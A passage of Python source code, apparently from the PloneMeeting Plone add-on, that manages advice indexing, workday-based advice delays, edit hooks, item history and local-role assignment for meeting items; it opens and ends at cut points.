for org_uid, adviceInfo in self.getGivenAdvices().iteritems():\n # first check that groupId is in self.adviceIndex, there could be 2 cases :\n # - in case an advice was asked automatically and condition that was True at the time\n # is not True anymore (item/getBudgetRelated for example) but the advice was given in between\n # However, in this case we have a 'row_id' stored in the given advice\n # - in case we have a not asked advice given by a PowerAdviser, in this case, we have no 'row_id'\n if org_uid not in self.adviceIndex:\n self.adviceIndex[org_uid] = PersistentMapping()\n if not adviceInfo['row_id']:\n # this is a given advice that was not asked (given by a PowerAdviser)\n adviceInfo['not_asked'] = True\n if adviceInfo['delay'] and \\\n org_uid in saved_stored_data and \\\n adapted._adviceDelayMayBeStarted(org_uid):\n # an automatic advice was given but because something changed on the item\n 
# for example switched from budgetRelated to not budgetRelated, the automatic\n # advice should not be asked, but as already given, we keep it\n adviceInfo['delay_started_on'] = saved_stored_data[org_uid]['delay_started_on']\n if org_uid in saved_stored_data:\n adviceInfo['delay_stopped_on'] = saved_stored_data[org_uid]['delay_stopped_on']\n adviceInfo['delay_for_automatic_adviser_changed_manually'] = \\\n saved_stored_data[org_uid]['delay_for_automatic_adviser_changed_manually']\n adviceInfo['delay_changes_history'] = saved_stored_data[org_uid]['delay_changes_history']\n adviceInfo['isConfidential'] = saved_stored_data[org_uid]['isConfidential']\n adviceInfo['proposing_group_comment'] = \\\n saved_stored_data[org_uid]['proposing_group_comment']\n else:\n adviceInfo['delay_for_automatic_adviser_changed_manually'] = False\n adviceInfo['delay_changes_history'] = []\n adviceInfo['isConfidential'] = cfg.getAdviceConfidentialityDefault()\n adviceInfo['proposing_group_comment'] = u''\n # index view/add/edit access\n adviceInfo['item_viewable_by_advisers'] = False\n adviceInfo['advice_addable'] = False\n adviceInfo['advice_editable'] = False\n adviceInfo['inherited'] = False\n adviceInfo['userids'] = []\n self.adviceIndex[org_uid].update(adviceInfo)\n\n # and remove specific permissions given to add advices\n # make sure the 'PloneMeeting: Add advice' permission is not\n # given to the 'MeetingAdviser' role\n self._removePermissionToRole(permission=AddAdvice,\n role_to_remove='MeetingAdviser',\n obj=self)\n # manage PowerAdvisers\n # we will give those groups the ability to give an advice on this item\n # even if the advice was not asked...\n for org_uid in cfg.getPowerAdvisersGroups():\n # if group already gave advice, we continue\n if org_uid in self.adviceIndex:\n continue\n # we even consider orgs having their _advisers Plone group\n # empty because this does not change anything in the UI and adding a\n # user after in the _advisers suffixed Plone group will do things work as expected\n if item_state in cfg.getItemAdviceStatesForOrg(org_uid):\n plone_group_id = get_plone_group_id(org_uid, suffix='advisers')\n # power advisers get only the right to add the advice, but not to see the item\n # this must be provided using another functionnality, like power observers or so\n self.manage_addLocalRoles(plone_group_id, ('MeetingAdviser', ))\n # make sure 'MeetingAdviser' has the 'AddAdvice' permission\n self._grantPermissionToRole(permission=AddAdvice,\n role_to_give='MeetingAdviser',\n obj=self)\n\n # Then, add local roles regarding asked advices\n wfTool = api.portal.get_tool('portal_workflow')\n for org_uid in self.adviceIndex.iterkeys():\n org = get_organization(org_uid)\n itemAdviceStates = org.get_item_advice_states(cfg)\n itemAdviceEditStates = org.get_item_advice_edit_states(cfg)\n itemAdviceViewStates = org.get_item_advice_view_states(cfg)\n plone_group_id = get_plone_group_id(org_uid, 'advisers')\n adviceObj = None\n if 'advice_id' in self.adviceIndex[org_uid]:\n adviceObj = getattr(self, self.adviceIndex[org_uid]['advice_id'])\n giveReaderAccess = True\n if item_state not in itemAdviceStates and \\\n item_state not in itemAdviceEditStates and \\\n item_state not in itemAdviceViewStates:\n giveReaderAccess = False\n # in this case, the advice is no more accessible in any way by the adviser\n # make sure the advice given by groupId is no more editable\n if adviceObj and not adviceObj.query_state() == 'advice_given':\n self.REQUEST.set('mayGiveAdvice', True)\n # add a comment for this 
transition triggered by the application,\n # we want to show why it was triggered : item state change or delay exceeded\n wf_comment = _('wf_transition_triggered_by_application')\n wfTool.doActionFor(adviceObj, 'giveAdvice', comment=wf_comment)\n self.REQUEST.set('mayGiveAdvice', False)\n # in case advice was not given or access to given advice is not kept,\n # we are done with this one\n # just check the keep_access_to_item_when_advice\n # when 'was_giveable' if item was in a state where advices were giveable\n # access is kept, when 'is_given', access is kept if advice given\n keep_access_to_item_when_advice = org.get_keep_access_to_item_when_advice(cfg)\n if (adviceObj and keep_access_to_item_when_advice == 'is_given') or \\\n (keep_access_to_item_when_advice == 'was_giveable' and\n set(itemAdviceStates).intersection(\n get_all_history_attr(self, attr_name='review_state'))):\n giveReaderAccess = True\n\n if adapted._itemToAdviceIsViewable(org_uid) and giveReaderAccess:\n # give access to the item if adviser can see it\n self.manage_addLocalRoles(plone_group_id, (READER_USECASES['advices'],))\n self.adviceIndex[org_uid]['item_viewable_by_advisers'] = True\n\n # manage delay, add/edit access only if advice is not inherited\n if not self.adviceIsInherited(org_uid):\n # manage delay-aware advice, we start the delay if not already started\n if item_state in itemAdviceStates and \\\n self.adviceIndex[org_uid]['delay'] and not \\\n self.adviceIndex[org_uid]['delay_started_on'] and \\\n adapted._adviceDelayMayBeStarted(org_uid):\n self.adviceIndex[org_uid]['delay_started_on'] = datetime.now()\n\n # check if user must be able to add an advice, if not already given\n # check also if the delay is not exceeded,\n # in this case the advice can not be given anymore\n delayIsNotExceeded = not self._adviceDelayIsTimedOut(\n org_uid, computeNewDelayInfos=True)\n if item_state in itemAdviceStates and \\\n not adviceObj and \\\n delayIsNotExceeded and \\\n adapted._adviceIsAddable(org_uid):\n # advisers must be able to add a 'meetingadvice', give\n # relevant permissions to 'MeetingAdviser' role\n # the 'Add portal content' permission is given by default to 'MeetingAdviser',\n # so we need to give 'PloneMeeting: Add advice' permission too\n self.manage_addLocalRoles(plone_group_id, ('MeetingAdviser', ))\n self._grantPermissionToRole(permission=AddAdvice,\n role_to_give='MeetingAdviser',\n obj=self)\n self.adviceIndex[org_uid]['advice_addable'] = True\n\n # is advice still editable?\n if item_state in itemAdviceEditStates and \\\n delayIsNotExceeded and \\\n adviceObj and \\\n adapted._adviceIsEditable(org_uid):\n # make sure the advice given by groupId is no more in state 'advice_given'\n # if it is the case, we set it back to the advice initial_state\n if adviceObj.query_state() == 'advice_given':\n try:\n # make the guard_expr protecting 'mayBackToAdviceInitialState' alright\n self.REQUEST.set('mayBackToAdviceInitialState', True)\n # add a comment for this transition triggered by the application\n wf_comment = _('wf_transition_triggered_by_application')\n wfTool.doActionFor(adviceObj, 'backToAdviceInitialState', comment=wf_comment)\n except WorkflowException:\n # if we have another workflow than default meetingadvice_workflow\n # maybe we can not 'backToAdviceInitialState'\n pass\n self.REQUEST.set('mayBackToAdviceInitialState', False)\n self.adviceIndex[org_uid]['advice_editable'] = True\n else:\n # make sure it is no more editable\n if adviceObj and not adviceObj.query_state() == 'advice_given':\n 
self.REQUEST.set('mayGiveAdvice', True)\n # add a comment for this transition triggered by the application\n wf_comment = _('wf_transition_triggered_by_application')\n wfTool.doActionFor(adviceObj, 'giveAdvice', comment=wf_comment)\n self.REQUEST.set('mayGiveAdvice', False)\n # if item needs to be accessible by advisers, it is already\n # done by self.manage_addLocalRoles here above because it is necessary in any case\n if item_state in itemAdviceViewStates:\n pass\n\n # make sure there is no 'delay_stopped_on' date if advice still giveable\n if item_state in itemAdviceStates:\n self.adviceIndex[org_uid]['delay_stopped_on'] = None\n # the delay is stopped for advices\n # when the advice can not be given anymore due to a workflow transition\n # we only do that if not already done (a stopped date is already defined)\n # and if we are not on the transition that reinitialize delays\n # and if ever delay was started\n if item_state not in itemAdviceStates and \\\n self.adviceIndex[org_uid]['delay'] and \\\n self.adviceIndex[org_uid]['delay_started_on'] and \\\n not isTransitionReinitializingDelays and \\\n not bool(org_uid in saved_stored_data and\n saved_stored_data[org_uid]['delay_stopped_on']):\n self.adviceIndex[org_uid]['delay_stopped_on'] = datetime.now()\n\n # compute and store delay_infos\n if self.adviceIsInherited(org_uid):\n # if we are removing the predecessor, advice is inherited but\n # the predecessor is not available anymore, double check\n inheritedAdviceInfos = self.getInheritedAdviceInfo(org_uid)\n adviceHolder = inheritedAdviceInfos and inheritedAdviceInfos['adviceHolder'] or self\n else:\n adviceHolder = self\n self.adviceIndex[org_uid]['delay_infos'] = adviceHolder.getDelayInfosForAdvice(org_uid)\n # send delay expiration warning notification if relevant\n self.sendAdviceDelayWarningMailIfRelevant(\n org_uid, old_adviceIndex)\n # update advice review_state\n if adviceObj is not None:\n self.adviceIndex[org_uid]['advice_review_state'] = adviceObj.query_state()\n else:\n self.adviceIndex[org_uid]['advice_review_state'] = None\n\n # update adviceIndex of every items for which I am the predecessor\n # this way inherited advices are correct if any\n successors = self.get_every_successors()\n for successor in successors:\n # removed inherited advice uids are advice removed on original item\n # that were inherited on back references\n removedInheritedAdviserUids = [\n adviceInfo['id'] for adviceInfo in successor.adviceIndex.values()\n if adviceInfo.get('inherited', False) and\n adviceInfo['id'] not in self.adviceIndex]\n if removedInheritedAdviserUids:\n for removedInheritedAdviserUid in removedInheritedAdviserUids:\n successor.adviceIndex[removedInheritedAdviserUid]['inherited'] = False\n successor.update_local_roles()\n\n # notify that advices have been updated so subproducts\n # may interact if necessary\n notify(AdvicesUpdatedEvent(self,\n triggered_by_transition=triggered_by_transition,\n old_adviceIndex=old_adviceIndex))\n self.REQUEST.set('currentlyUpdatingAdvice', False)\n indexes = []\n try:\n if self.adviceIndex != old_adviceIndex:\n indexes += adapted.getAdviceRelatedIndexes()\n except UnicodeDecodeError:\n indexes += adapted.getAdviceRelatedIndexes()\n return indexes\n\n def _itemToAdviceIsViewable(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def _adviceIsAddable(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def _adviceIsAddableByCurrentUser(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def 
_adviceIsEditable(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def _adviceIsEditableByCurrentUser(self, org_uid):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n adviceObj = item.getAdviceObj(org_uid)\n return _checkPermission(ModifyPortalContent, adviceObj)\n\n def _adviceDelayMayBeStarted(self, org_uid):\n '''See doc in interfaces.py.'''\n return True\n\n def _adviceDelayWillBeReinitialized(self,\n org_uid,\n adviceInfo,\n isTransitionReinitializingDelays):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n reinit_delay = False\n if isTransitionReinitializingDelays and not item._advice_is_given(org_uid):\n reinit_delay = True\n return reinit_delay\n\n security.declarePublic('getDelayInfosForAdvice')\n\n def getDelayInfosForAdvice(self, advice_id):\n '''Compute left delay in number of days for given p_advice_id.\n Returns real left delay, a status information aka :\n - not yet giveable;\n - still in delays;\n - delays timeout.\n Returns also the real limit date and the initial delay.\n This call is only relevant for a delay-aware advice.'''\n toLocalizedTime = self.restrictedTraverse('@@plone').toLocalizedTime\n data = {'left_delay': None,\n 'delay_status': None,\n 'limit_date': None,\n 'limit_date_localized': None,\n 'delay': None,\n 'delay_started_on_localized': None,\n 'delay_stopped_on_localized': None,\n 'delay_when_stopped': None,\n 'delay_status_when_stopped': None}\n delay_started_on = delay_stopped_on = None\n adviceInfos = self.adviceIndex[advice_id]\n # if it is not a delay-aware advice, return\n if not adviceInfos['delay']:\n return {}\n\n delay = int(adviceInfos['delay'])\n data['delay'] = delay\n if adviceInfos['delay_started_on']:\n data['delay_started_on_localized'] = toLocalizedTime(adviceInfos['delay_started_on'])\n delay_started_on = self._doClearDayFrom(adviceInfos['delay_started_on'])\n\n if adviceInfos['delay_stopped_on']:\n data['delay_stopped_on_localized'] = toLocalizedTime(adviceInfos['delay_stopped_on'])\n delay_stopped_on = self._doClearDayFrom(adviceInfos['delay_stopped_on'])\n\n # if delay still not started, we return complete delay\n # except special case where we asked an advice when\n # advice are not giveable anymore\n if not delay_started_on:\n if not delay_stopped_on:\n data['left_delay'] = delay\n data['delay_status'] = 'not_yet_giveable'\n return data\n else:\n # here finally the delay is stopped\n # but it never started for current advice\n data['left_delay'] = delay\n data['delay_status'] = 'never_giveable'\n return data\n\n tool = api.portal.get_tool('portal_plonemeeting')\n holidays = tool.getHolidaysAs_datetime()\n weekends = tool.getNonWorkingDayNumbers()\n unavailable_weekdays = tool.getUnavailableWeekDaysNumbers()\n limit_date = workday(delay_started_on,\n delay,\n holidays=holidays,\n weekends=weekends,\n unavailable_weekdays=unavailable_weekdays)\n data['limit_date'] = limit_date\n data['limit_date_localized'] = toLocalizedTime(limit_date)\n\n # if delay is stopped, it means that we can no more give the advice\n if delay_stopped_on:\n data['left_delay'] = delay\n # compute how many days left/exceeded when the delay was stopped\n # find number of days between delay_started_on and delay_stopped_on\n delay_when_stopped = networkdays(adviceInfos['delay_stopped_on'],\n limit_date,\n holidays=holidays,\n weekends=weekends)\n data['delay_when_stopped'] = delay_when_stopped\n if data['delay_when_stopped'] > 0:\n data['delay_status_when_stopped'] = 'stopped_still_time'\n else:\n 
data['delay_status_when_stopped'] = 'stopped_timed_out'\n\n data['delay_status'] = 'no_more_giveable'\n return data\n\n # compute left delay taking holidays, and unavailable weekday into account\n left_delay = networkdays(datetime.now(),\n limit_date,\n holidays=holidays,\n weekends=weekends)\n data['left_delay'] = left_delay\n\n if left_delay >= 0:\n # delay status is either 'we have time' or 'please hurry up' depending\n # on value defined in 'delay_left_alert'\n if not adviceInfos['delay_left_alert'] or int(adviceInfos['delay_left_alert']) < left_delay:\n data['delay_status'] = 'still_time'\n else:\n data['delay_status'] = 'still_time_but_alert'\n else:\n data['delay_status'] = 'timed_out'\n\n # advice already given, or left_delay negative left_delay shown is delay\n # so left_delay displayed on the advices popup is not something like '-547'\n # only show left delay if advice in under redaction, aka not really given...\n if not adviceInfos['hidden_during_redaction'] and \\\n (adviceInfos['advice_given_on'] or data['left_delay'] < 0):\n data['left_delay'] = delay\n return data\n\n return data\n\n security.declarePublic('getCopyGroupsHelpMsg')\n\n def getCopyGroupsHelpMsg(self, cfg):\n '''Help message regarding copy groups configuration.'''\n translated_states = translate_list(cfg.getItemCopyGroupsStates())\n msg = translate(msgid=\"copy_groups_help_msg\",\n domain=\"PloneMeeting\",\n mapping={\"states\": translated_states},\n context=self.REQUEST)\n return msg\n\n security.declarePublic('getAdviceHelpMessageFor')\n\n def getAdviceHelpMessageFor(self, **adviceInfos):\n '''Build a specific help message for the given advice_id. We will compute\n a message based on the fact that the advice is optional or not and that there\n are defined 'Help message' in the MeetingConfig.customAdvisers configuration (for performance,\n the 'Help message' infos from the configuration are stored in the adviceIndex).'''\n # base help message is based on the fact that advice is optional or not\n help_msg = ''\n if adviceInfos['optional']:\n # the advice was not asked but given by a super adviser\n if adviceInfos['not_asked']:\n help_msg = translate('This optional advice was given of initiative by a power adviser',\n domain=\"PloneMeeting\",\n context=self.REQUEST)\n else:\n help_msg = translate('This optional advice was asked by the item creators',\n domain=\"PloneMeeting\",\n context=self.REQUEST)\n else:\n help_msg = translate('This automatic advice has been asked by the application',\n domain=\"PloneMeeting\",\n context=self.REQUEST)\n # an additional help message can be provided for automatically asked advices\n help_msg = \"%s \\n%s: %s\" % (help_msg,\n translate('Advice asked automatically because',\n domain=\"PloneMeeting\",\n context=self.REQUEST),\n unicode(adviceInfos['gives_auto_advice_on_help_message'], 'utf-8') or '-')\n # if it is a delay-aware advice, display the number of days to give the advice\n # like that, when the limit decrease (3 days left), we still have the info\n # about original number of days to give advice\n if adviceInfos['delay']:\n help_msg += \"\\n%s\" % translate('Days to give advice',\n domain=\"PloneMeeting\",\n mapping={'daysToGiveAdvice': adviceInfos['delay']},\n context=self.REQUEST)\n # advice review_states related informations (addable, editable/removeable, viewable)\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n item_advice_states = cfg.getItemAdviceStatesForOrg(adviceInfos['id'])\n translated_item_advice_states = 
translate_list(item_advice_states)\n advice_states_msg = translate(\n 'This advice is addable in following states : ${item_advice_states}.',\n mapping={'item_advice_states': translated_item_advice_states},\n domain=\"PloneMeeting\",\n context=self.REQUEST)\n return help_msg + '\\n' + advice_states_msg\n\n security.declarePrivate('at_post_create_script')\n\n def at_post_create_script(self, **kwargs):\n # The following field allows storing events that occurred in the life\n # of an item, like annex deletions or additions.\n self.itemHistory = PersistentList()\n # Add a place to store automatically added copyGroups\n self.autoCopyGroups = PersistentList()\n # Remove temp local role that allowed to create the item in\n # portal_factory.\n userId = get_current_user_id(self.REQUEST)\n self.manage_delLocalRoles([userId])\n self.manage_addLocalRoles(userId, ('Owner',))\n # update groupsInCharge before update_local_roles\n self.update_groups_in_charge()\n indexes = self.update_local_roles(\n isCreated=True,\n inheritedAdviserUids=kwargs.get('inheritedAdviserUids', []))\n # clean borg.localroles caching\n cleanMemoize(self, prefixes=['borg.localrole.workspace.checkLocalRolesAllowed'])\n # Apply potential transformations to richtext fields\n transformAllRichTextFields(self)\n # Make sure we have 'text/html' for every Rich field\n forceHTMLContentTypeForEmptyRichFields(self)\n # update committees if necessary\n indexes += self.update_committees()\n # reindex necessary indexes\n self.reindexObject(idxs=indexes)\n # itemReference uses MeetingConfig.computeItemReferenceForItemsOutOfMeeting?\n self.update_item_reference()\n # Call sub-product-specific behaviour\n self.adapted().onEdit(isCreated=True)\n\n def _update_after_edit(self, idxs=['*'], reindex_local_roles=True):\n \"\"\"Convenience method that makes sure ObjectModifiedEvent and\n at_post_edit_script are called, like it is the case in\n Archetypes.BaseObject.processForm.\n We also call reindexObject here so we avoid multiple reindexations\n as it is already done in processForm.\n This is called when we change something on an item and we do not\n use processForm.\"\"\"\n # WARNING, we do things in the same order processForm does:\n # reindexObject is done in _processForm, then notify and the\n # call to at_post_edit_script are done\n # moreover, warn when called with idxs=['*']\n if idxs == ['*']:\n logger.warn(\"MeetingItem._update_after_edit was called with \"\n \"idxs=['*'], make sure this is correct!\")\n notifyModifiedAndReindex(self, extra_idxs=idxs, notify_event=True)\n self.at_post_edit_script(\n full_edit_form=False, reindex_local_roles=reindex_local_roles)\n\n security.declarePrivate('at_post_edit_script')\n\n def at_post_edit_script(self, full_edit_form=True, reindex_local_roles=False):\n # update groupsInCharge before update_local_roles\n self.update_groups_in_charge()\n indexes = self.update_local_roles(\n invalidate=self.willInvalidateAdvices(),\n isCreated=False,\n avoid_reindex=True)\n if full_edit_form:\n # Apply potential transformations to richtext fields\n transformAllRichTextFields(self)\n # Add a line in history if historized fields have changed\n addDataChange(self)\n # Make sure we have 'text/html' for every Rich field\n forceHTMLContentTypeForEmptyRichFields(self)\n # update committees if necessary\n indexes += self.update_committees()\n if reindex_local_roles or full_edit_form:\n self.reindexObject(idxs=indexes)\n # Call sub-product-specific behaviour\n self.adapted().onEdit(isCreated=False)\n\n 
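# Illustrative usage sketch only, not part of the API: a caller that\n # changed a single field would avoid the expensive default idxs=['*']\n # and pass only the indexes related to what changed, e.g.:\n #\n # item.setBudgetRelated(True) # Archetypes mutator name assumed here\n # item._update_after_edit(idxs=['SearchableText'])\n #\n # 'SearchableText' is a standard catalog index used as an example; pass\n # the indexes that actually cover the modified fields.\n\n 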
security.declarePublic('updateHistory')\n\n def updateHistory(self, action, subObj, **kwargs):\n '''Adds an event to the item history. p_action may be 'add' or 'delete'.\n p_subObj is the sub-object created or deleted (i.e. an annex). p_kwargs\n are additional entries that will be stored in the event within item's\n history.'''\n # Update history only if the item is in some states\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if self.query_state() in cfg.getRecordItemHistoryStates():\n # Create the event\n user_id = get_current_user_id(self.REQUEST)\n event = {'action': action, 'type': subObj.meta_type,\n 'title': subObj.Title(), 'time': DateTime(),\n 'actor': user_id}\n event.update(kwargs)\n # Add the event to item's history\n self.itemHistory.append(event)\n\n def _getGroupManagingItem(self, review_state, theObject=False):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n return item.getProposingGroup(theObject=theObject)\n\n def _getAllGroupsManagingItem(self, review_state, theObjects=False):\n '''See doc in interfaces.py.'''\n res = []\n item = self.getSelf()\n proposingGroup = item.getProposingGroup(theObject=theObjects)\n if proposingGroup:\n res.append(proposingGroup)\n return res\n\n def _assign_roles_to_group_suffixes(self, org_uid, suffix_roles):\n \"\"\"Helper that applies, for p_org_uid, the local roles given in p_suffix_roles.\n p_suffix_roles is like:\n {'observers': ['Reader'], 'creators': ['Reader']}\n \"\"\"\n # apply local roles to computed suffixes\n for suffix, roles in suffix_roles.items():\n # suffix_roles keeps only existing suffixes\n plone_group_id = get_plone_group_id(org_uid, suffix)\n if not isinstance(roles, (list, tuple)):\n raise Exception(\n \"Parameter suffix_roles values must be of type tuple or list!\")\n self.manage_addLocalRoles(plone_group_id, tuple(roles))\n\n def _assign_roles_to_all_groups_managing_item_suffixes(self,\n cfg,\n item_state,\n org_uids,\n org_uid):\n '''See doc in interfaces.py.'''\n # by default, every suffix receives the Reader role\n item = self.getSelf()\n for managing_org_uid in org_uids:\n suffix_roles = {suffix: ['Reader'] for suffix in\n get_all_suffixes(managing_org_uid)}\n item._assign_roles_to_group_suffixes(managing_org_uid, suffix_roles)\n\n def assign_roles_to_group_suffixes(self, cfg, item_state):\n \"\"\"Method that does the work of assigning relevant roles to\n suffixed groups of an organization depending on current state:\n - suffix '_observers' will have the 'Reader' role in every case;\n - state 'itemcreated', _creators is 'Editor';\n - states managed by MeetingConfig.itemWFValidationLevels.\n For now, we manage every role:\n - itemcreated;\n - validation levels\n For unknown states, method _get_corresponding_state_to_assign_local_roles\n will be used to determine a known configuration to take into account\"\"\"\n adapted = self.adapted()\n # Add the local roles corresponding to the group managing the item\n org_uid = adapted._getGroupManagingItem(item_state, theObject=False)\n # in some cases, like ItemTemplate, we have no proposing group\n if not org_uid:\n return\n apply_meetingmanagers_access, suffix_roles = compute_item_roles_to_assign_to_suffixes(\n cfg, self, item_state, org_uid)\n\n # apply local roles to computed suffixes\n self._assign_roles_to_group_suffixes(org_uid, suffix_roles)\n\n # when more than one group is managing the item, make sure every group gets access\n org_uids = adapted._getAllGroupsManagingItem(item_state)\n if len(org_uids) > 1:\n 
adapted._assign_roles_to_all_groups_managing_item_suffixes(\n cfg, item_state, org_uids, org_uid)\n\n # MeetingManagers get access if item is at least validated or decided;\n # decided will include states \"decided out of meeting\";\n # if it is still not decided, they get full access\n if apply_meetingmanagers_access:\n mmanagers_item_states = ['validated'] + list(cfg.getItemDecidedStates())\n if item_state in mmanagers_item_states or self.hasMeeting():\n mmanagers_group_id = \"{0}_{1}\".format(cfg.getId(), MEETINGMANAGERS_GROUP_SUFFIX)\n # 'Reviewer' also on decided item, the WF guard will\n # avoid corrections if the meeting is closed; give 'Contributor' to be\n # able to add decision annexes\n mmanagers_roles = ['Reader', 'Reviewer', 'Contributor']\n if not self.is_decided(cfg, item_state):\n mmanagers_roles += ['Editor']\n self.manage_addLocalRoles(mmanagers_group_id, tuple(mmanagers_roles))\n\n security.declareProtected(ModifyPortalContent, 'update_local_roles')\n\n def update_local_roles(self, reindex=True, avoid_reindex=False, **kwargs):\n '''Updates the local roles of this item, regarding:\n - the proposing group;\n - copyGroups;\n - advices;\n - power observers;\n - budget impact editors;\n - internal notes editors;\n - categorized elements (especially 'visible_for_groups');\n - then call a subscriber 'after local roles updated'.'''\n # remove every localRoles then recompute\n old_local_roles = _clear_local_roles(self)\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n item_state = self.query_state()\n # local_roles related indexes\n related_indexes = ['getCopyGroups', 'getGroupsInCharge']\n\n # update suffixes related local roles\n self.assign_roles_to_group_suffixes(cfg, item_state)\n\n # update local roles regarding copyGroups\n isCreated = kwargs.get('isCreated', None)\n self._updateCopyGroupsLocalRoles(isCreated, cfg, item_state)\n # Update advices after update_local_roles because it\n # reinitializes existing local roles\n triggered_by_transition = kwargs.get('triggered_by_transition', None)\n invalidate = kwargs.get('invalidate', False)\n inheritedAdviserUids = kwargs.get('inheritedAdviserUids', [])\n # reindex \"indexAdvisers\" if adviceIndex changed\n related_indexes += self._updateAdvices(\n cfg,\n item_state,\n invalidate=invalidate,\n triggered_by_transition=triggered_by_transition,\n inheritedAdviserUids=inheritedAdviserUids)\n # Update every 'power observers' local roles given to the\n # corresponding MeetingConfig.powerObservers\n # it is done on every edit because of 'item_access_on' TAL expression\n self._updatePowerObserversLocalRoles(cfg, item_state)\n # update budget impact editors local roles\n self._updateBudgetImpactEditorsLocalRoles(cfg, item_state)\n # update internal notes editors local roles\n self._updateInternalNotesEditorsLocalRoles(cfg, item_state)\n # update committees editors local roles\n self._updateCommitteeEditorsLocalRoles(cfg, item_state)\n # update group in charge local roles\n # we will give the current groupsInCharge _observers sub group access to this item\n self._updateGroupsInChargeLocalRoles(cfg, item_state)\n # manage automatically given permissions\n _addManagedPermissions(self)\n # clean borg.localroles caching\n cleanMemoize(self, prefixes=['borg.localrole.workspace.checkLocalRolesAllowed'])\n # notify that localRoles have been updated\n notify(ItemLocalRolesUpdatedEvent(self, old_local_roles))\n # update annexes categorized_elements to store 'visible_for_groups'\n # do it only if local_roles changed\n # 
do not do it when isCreated, this is only possible when item duplicated\n # in this case, annexes are correct\n if not isCreated and old_local_roles != self.__ac_local_roles__:\n updateAnnexesAccess(self)\n # update categorized elements on contained advices too\n for advice in self.getAdvices():\n updateAnnexesAccess(advice)\n # propagate Reader local_roles to sub elements\n # this way for example users that have Reader role on item may view the advices\n self._propagateReaderAndMeetingManagerLocalRolesToSubObjects(cfg)\n # reindex object security except if avoid_reindex=True and localroles are the same\n # or if we are here after transition as WorkflowTool._reindexWorkflowVariables\n # will reindexObjectSecurity\n if not avoid_reindex or old_local_roles != self.__ac_local_roles__:\n # triggering transition will reindexObjectSecurity\n if not triggered_by_transition:\n self.reindexObjectSecurity()\n if reindex:\n self.reindexObject(idxs=related_indexes)\n return related_indexes\n\n def _propagateReaderAndMeetingManagerLocalRolesToSubObjects(self, cfg):\n \"\"\"Propagate the 'Reader' and 'MeetingManager' local roles to\n sub objects that are blocking local roles inheritance.\"\"\"\n objs = [obj for obj in self.objectValues()\n if getattr(obj, '__ac_local_roles_block__', False)]\n if objs:\n grp_reader_localroles = [\n grp_id for grp_id in self.__ac_local_roles__\n if 'Reader' in self.__ac_local_roles__[grp_id]]\n meetingmanager_group_id = get_plone_group_id(cfg.getId(), MEETINGMANAGERS_GROUP_SUFFIX)\n for obj in objs:\n # clear local roles then recompute\n # only Reader local roles are set, the Editor/Contributor\n # local roles are set by borg.localroles\n _clear_local_roles(obj)\n for grp_id in grp_reader_localroles:\n obj.manage_addLocalRoles(grp_id, ['Reader'])\n obj.manage_addLocalRoles(meetingmanager_group_id, ['MeetingManager'])\n\n def _updateCopyGroupsLocalRoles(self, isCreated, cfg, item_state):\n '''Give the 'Reader' local role to the copy groups\n depending on what is defined in the corresponding meetingConfig.'''\n if not self.attribute_is_used('copyGroups'):\n return\n # Check if some copyGroups must be automatically added\n self.addAutoCopyGroups(isCreated=isCreated)\n\n # check if copyGroups should have access to this item for current review state\n if item_state not in cfg.getItemCopyGroupsStates():\n return\n # Add the local roles corresponding to the selected copyGroups.\n # We give the 'Reader' role to the selected groups.\n # This will give them a read-only access to the item.\n copyGroupIds = self.getAllCopyGroups(auto_real_plone_group_ids=True)\n for copyGroupId in copyGroupIds:\n self.manage_addLocalRoles(copyGroupId, (READER_USECASES['copy_groups'],))\n\n def _updatePowerObserversLocalRoles(self, cfg, item_state):\n '''Give local roles to the groups defined in MeetingConfig.powerObservers.'''\n extra_expr_ctx = _base_extra_expr_ctx(self)\n extra_expr_ctx.update({'item': self, })\n cfg_id = cfg.getId()\n for po_infos in cfg.getPowerObservers():\n if item_state in po_infos['item_states'] and \\\n _evaluateExpression(self,\n expression=po_infos['item_access_on'],\n extra_expr_ctx=extra_expr_ctx):\n powerObserversGroupId = \"%s_%s\" % (cfg_id, po_infos['row_id'])\n self.manage_addLocalRoles(powerObserversGroupId,\n (READER_USECASES['powerobservers'],))\n\n def _updateBudgetImpactEditorsLocalRoles(self, cfg, item_state):\n '''Configure local role for use case 'budget_impact_reviewers' to the corresponding\n MeetingConfig 'budgetimpacteditors' group.'''\n if item_state 
not in cfg.getItemBudgetInfosStates():\n return\n budgetImpactEditorsGroupId = \"%s_%s\" % (cfg.getId(), BUDGETIMPACTEDITORS_GROUP_SUFFIX)\n self.manage_addLocalRoles(budgetImpactEditorsGroupId, ('MeetingBudgetImpactEditor',))\n\n def _updateInternalNotesEditorsLocalRoles(self, cfg, item_state):\n '''Add local roles depending on MeetingConfig.\n We use the IIconifiedInfos adapter that computes groups to give local roles to.'''\n if not self.attribute_is_used('internalNotes'):\n return\n # as computing groups for internal notes is the same as computing groups\n # for access to confidential annexes, we use the code in the IIconifiedInfos adapter\n adapter = getAdapter(self, IIconifiedInfos)\n adapter.parent = self\n group_ids = adapter._item_visible_for_groups(\n adapter.cfg.getItemInternalNotesEditableBy())\n for group_id in group_ids:\n self.manage_addLocalRoles(group_id, ('MeetingInternalNotesEditor',))\n\n def _updateCommitteeEditorsLocalRoles(self, cfg, item_state):\n '''Add local roles depending on MeetingConfig.committees.'''\n if item_state in cfg.getItemCommitteesStates():\n local_roles = (\"MeetingCommitteeEditor\", \"Reader\")\n elif item_state in cfg.getItemCommitteesViewStates():\n local_roles = (\"Reader\", )\n else:\n return\n cfg_id = cfg.getId()\n for committee_id in self.getCommittees():\n if committee_id != NO_COMMITTEE and \\\n cfg.getCommittees(committee_id=committee_id)['enable_editors'] == \"1\":\n self.manage_addLocalRoles(\n get_plone_group_id(cfg_id, committee_id), local_roles)\n\n def _updateGroupsInChargeLocalRoles(self, cfg, item_state):\n '''Get the current groupsInCharge and give View access to the _observers Plone group.'''\n if item_state not in cfg.getItemGroupsInChargeStates():\n return\n groupsInChargeUids = self.getGroupsInCharge(theObjects=False, 